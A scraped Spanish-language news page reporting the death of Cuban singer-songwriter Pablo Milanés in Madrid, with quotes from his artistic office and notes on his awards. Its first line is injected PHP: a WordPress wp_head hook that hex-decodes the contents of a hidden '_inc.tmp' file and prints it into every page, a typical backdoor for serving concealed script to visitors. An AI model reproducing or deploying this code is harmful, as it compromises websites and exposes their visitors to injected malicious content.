if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Muere Pablo Milanés a los 79 años de edad – Reporte Noreste
Conéctate con nosotros

CYEN

Muere Pablo Milanés a los 79 años de edad

Muere Pablo Milanés a los 79 años de edad

El cantautor Pablo Milanés, en un hospital de Madrid, España, en donde se encontraba internado debido a complicaciones por el cáncer que padecía.

La noticia se dio a conocer la noche del lunes en México por representantes del cantautor de 79 años de edad.

“Con gran dolor y tristeza, lamentamos informar que el maestro Pablo Milanés ha fallecido esta madrugada del 22 de noviembre en Madrid”.

“Agradecemos profundamente tocas las muestras de cariño y apoyo, a toda su familia y amigos, en estos momentos tan difíciles. ¡Que descanse en el amor y en la paz que siempre ha transmitido. Permanecerá eternamente en nuestra memoria”, publicó la Oficina Artística de Pablo Milanés.

Pablo Milanés publicó más de 40 discos a lo largo de su carrera y obtuvo premios como El Premio Nacional de Música de Cuba y el Grammy Latino a la Excelencia Musical.

Desde la redacción.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en CYEN